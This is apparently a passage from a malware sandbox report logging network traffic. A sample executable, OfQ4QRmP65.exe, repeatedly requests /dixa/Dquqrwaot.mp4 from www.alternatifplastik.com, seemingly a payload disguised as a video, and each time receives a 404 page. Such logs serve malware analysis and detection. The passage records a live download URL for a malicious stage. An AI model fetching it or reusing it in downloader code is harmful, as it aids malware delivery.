                          2025-03-07 14:49:33 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          34192.168.2.11497405.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:35 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:36 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:34 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:36 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          35192.168.2.11497415.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:38 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:39 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:37 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:39 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          36192.168.2.11497425.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:41 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:42 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:39 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:42 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          37192.168.2.11497435.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:44 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:45 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:42 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:45 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          38192.168.2.11497445.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:47 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:48 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:45 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:48 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          39192.168.2.11497455.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:50 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:51 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:48 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:51 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          40192.168.2.11497465.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:53 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:54 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:51 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:54 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          41192.168.2.11497475.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:56 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:57 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:54 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:57 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          42192.168.2.11497485.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:59 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:00 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:57 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:00 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          43192.168.2.11497495.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:02 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:03 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:00 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:03 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          44192.168.2.11497505.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:05 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:06 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:03 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:06 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          45192.168.2.11497515.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:08 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:08 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:06 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
